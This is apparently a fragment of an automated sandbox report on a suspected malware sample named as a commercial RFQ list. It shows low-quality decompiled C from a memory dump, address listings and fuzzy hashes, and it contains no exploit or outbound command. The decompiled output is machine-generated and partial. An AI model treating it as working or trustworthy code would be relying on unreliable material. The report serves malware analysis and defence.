                                                                                                                                                                                  0x3334e6b2
                                                                                                                                                                                  0x3334e6b7
                                                                                                                                                                                  0x3334e6bc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334e6bc
                                                                                                                                                                                  0x3334e6a4
                                                                                                                                                                                  0x3334e6a4
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: ^43
                                                                                                                                                                                  • API String ID: 3446177414-2712615236
                                                                                                                                                                                  • Opcode ID: 1ec76e46d15ac1caf46029128306d484487fb03c44d0d098f85fa3f3bfa040ad
                                                                                                                                                                                  • Instruction ID: 034a21f5cc553a250428dcfccc3969e94cdffbbf64fa19dc014e8907248d03f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec76e46d15ac1caf46029128306d484487fb03c44d0d098f85fa3f3bfa040ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 06415EB9A05211DFEB15CF19C884955BBF9FF99750B14C07AEC089B360DB35E891CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                  			E3334DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3344b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E33398F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L33362330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E333624D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x334491e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E33394B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                                                                                                  0x3334df21
                                                                                                                                                                                  0x3334df29
                                                                                                                                                                                  0x3334df33
                                                                                                                                                                                  0x3334df3b
                                                                                                                                                                                  0x3334df40
                                                                                                                                                                                  0x3334df44
                                                                                                                                                                                  0x3334df46
                                                                                                                                                                                  0x3334df52
                                                                                                                                                                                  0x3334df56
                                                                                                                                                                                  0x3334df5b
                                                                                                                                                                                  0x3334df5e
                                                                                                                                                                                  0x3334df61
                                                                                                                                                                                  0x3334df65
                                                                                                                                                                                  0x3334df67
                                                                                                                                                                                  0x3334e058
                                                                                                                                                                                  0x3334e05a
                                                                                                                                                                                  0x3334e05d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334df6d
                                                                                                                                                                                  0x3334df6d
                                                                                                                                                                                  0x3334df70
                                                                                                                                                                                  0x333ad6ea
                                                                                                                                                                                  0x333ad6f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ad6ec
                                                                                                                                                                                  0x333ad6ec
                                                                                                                                                                                  0x333ad6ec
                                                                                                                                                                                  0x3334df76
                                                                                                                                                                                  0x3334df76
                                                                                                                                                                                  0x3334df78
                                                                                                                                                                                  0x3334df78
                                                                                                                                                                                  0x3334df79
                                                                                                                                                                                  0x3334df80
                                                                                                                                                                                  0x3334e019
                                                                                                                                                                                  0x3334e024
                                                                                                                                                                                  0x3334e02c
                                                                                                                                                                                  0x3334e032
                                                                                                                                                                                  0x3334e03b
                                                                                                                                                                                  0x3334e045
                                                                                                                                                                                  0x3334e04b
                                                                                                                                                                                  0x3334e04e
                                                                                                                                                                                  0x3334e04e
                                                                                                                                                                                  0x3334df8d
                                                                                                                                                                                  0x3334df91
                                                                                                                                                                                  0x3334df94
                                                                                                                                                                                  0x3334df99
                                                                                                                                                                                  0x3334dfa0
                                                                                                                                                                                  0x3334dfab
                                                                                                                                                                                  0x3334dfb3
                                                                                                                                                                                  0x3334dfb7
                                                                                                                                                                                  0x3334dfbb
                                                                                                                                                                                  0x3334dfbc
                                                                                                                                                                                  0x3334dfc0
                                                                                                                                                                                  0x3334dfc8
                                                                                                                                                                                  0x3334dfc9
                                                                                                                                                                                  0x3334dfca
                                                                                                                                                                                  0x3334dfcd
                                                                                                                                                                                  0x3334dfe0
                                                                                                                                                                                  0x3334dfea
                                                                                                                                                                                  0x3334dfea
                                                                                                                                                                                  0x3334dfec
                                                                                                                                                                                  0x3334dfec
                                                                                                                                                                                  0x3334df70
                                                                                                                                                                                  0x3334dff2
                                                                                                                                                                                  0x3334dff3
                                                                                                                                                                                  0x3334dff4
                                                                                                                                                                                  0x3334dfff

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: 0$0
                                                                                                                                                                                  • API String ID: 3446177414-203156872
                                                                                                                                                                                  • Opcode ID: dd41a13ff7dfc0e8b86fe13c622c3cfcb3549e57f3a97f65ccc2964889df6a6a
                                                                                                                                                                                  • Instruction ID: 663e3e7933683ca88fe1aa4653206dc9ac22b276af0d903814835c34a66d2486
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd41a13ff7dfc0e8b86fe13c622c3cfcb3549e57f3a97f65ccc2964889df6a6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D14162B5A087019FD310CF28C894A56BBE4FF89354F058A6EF588DB341D771E905CB96
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                  			E3334E880(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				intOrPtr* _t42;
				intOrPtr _t49;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t56;

				_push(0x28);
				L333A7C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t54 - 0x30)) =  *((intOrPtr*)(_t54 + 8));
				 *((intOrPtr*)(_t54 - 0x24)) =  *((intOrPtr*)(_t54 + 0xc));
				 *((intOrPtr*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 + 0x10));
				_t42 =  *((intOrPtr*)(_t54 + 0x14));
				 *((intOrPtr*)(_t54 - 0x34)) =  *((intOrPtr*)(_t54 + 0x18));
				_t49 =  *((intOrPtr*)(_t54 + 0x1c));
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				E33396510(0x1000, 0x3342bb58);
				 *((intOrPtr*)(_t54 - 0x18)) = _t56;
				_t52 = _t56;
				 *((intOrPtr*)(_t54 - 0x38)) = _t52;
				 *(_t54 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t54 - 0x28)) = 0x1000;
				_push(_t54 - 0x28);
				_push(_t52);
				_t18 = _t54 - 0x2c; // 0x3334e920
				_push(0);
				_push(_t49);
				_push(_t54 - 0x24);
				_t38 = E33393FE0();
				if(_t38 >= 0) {
					_t20 = _t54 - 0x2c; // 0x3334e920
					_t39 =  *_t20;
					 *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x30)))) = _t39;
					_t23 = _t54 - 0x34; // 0x3334e96d
					 *0x334491e0( *((intOrPtr*)(_t54 - 0x24)),  *((intOrPtr*)(_t54 - 0x20)), _t39, _t49,  *_t23, _t52,  *((intOrPtr*)(_t54 - 0x28)));
					_t38 =  *_t42();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0x10));
				return _t38;
			}










                                                                                                                                                                                  0x3334e880
                                                                                                                                                                                  0x3334e887
                                                                                                                                                                                  0x3334e88f
                                                                                                                                                                                  0x3334e895
                                                                                                                                                                                  0x3334e89b
                                                                                                                                                                                  0x3334e89e
                                                                                                                                                                                  0x3334e8a4
                                                                                                                                                                                  0x3334e8a7
                                                                                                                                                                                  0x3334e8aa
                                                                                                                                                                                  0x3334e8b3
                                                                                                                                                                                  0x3334e8b8
                                                                                                                                                                                  0x3334e8bb
                                                                                                                                                                                  0x3334e8bd
                                                                                                                                                                                  0x3334e8c0
                                                                                                                                                                                  0x3334e8c7
                                                                                                                                                                                  0x3334e8d1
                                                                                                                                                                                  0x3334e8d2
                                                                                                                                                                                  0x3334e8d3
                                                                                                                                                                                  0x3334e8d7
                                                                                                                                                                                  0x3334e8d9
                                                                                                                                                                                  0x3334e8dd
                                                                                                                                                                                  0x3334e8de
                                                                                                                                                                                  0x3334e8e5
                                                                                                                                                                                  0x3334e8e7
                                                                                                                                                                                  0x3334e8e7
                                                                                                                                                                                  0x3334e8ed
                                                                                                                                                                                  0x3334e8f3
                                                                                                                                                                                  0x3334e900
                                                                                                                                                                                  0x3334e906
                                                                                                                                                                                  0x3334e906
                                                                                                                                                                                  0x3334e90e
                                                                                                                                                                                  0x3334e91a

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: 43$m43
                                                                                                                                                                                  • API String ID: 3446177414-3768462857
                                                                                                                                                                                  • Opcode ID: 722416de31bf09862f9455ee61c642839e0554065422172b86aaef00b0780c34
                                                                                                                                                                                  • Instruction ID: 8da4e814a7a6a2b745d656ea4d15c86ef265282c52a6f398d767105dd53daf75
                                                                                                                                                                                  • Opcode Fuzzy Hash: 722416de31bf09862f9455ee61c642839e0554065422172b86aaef00b0780c34
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1511B3B6E01208AFDF11CF98D885ADEBBF4EB48360F104119F911B7240D735A954CB60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%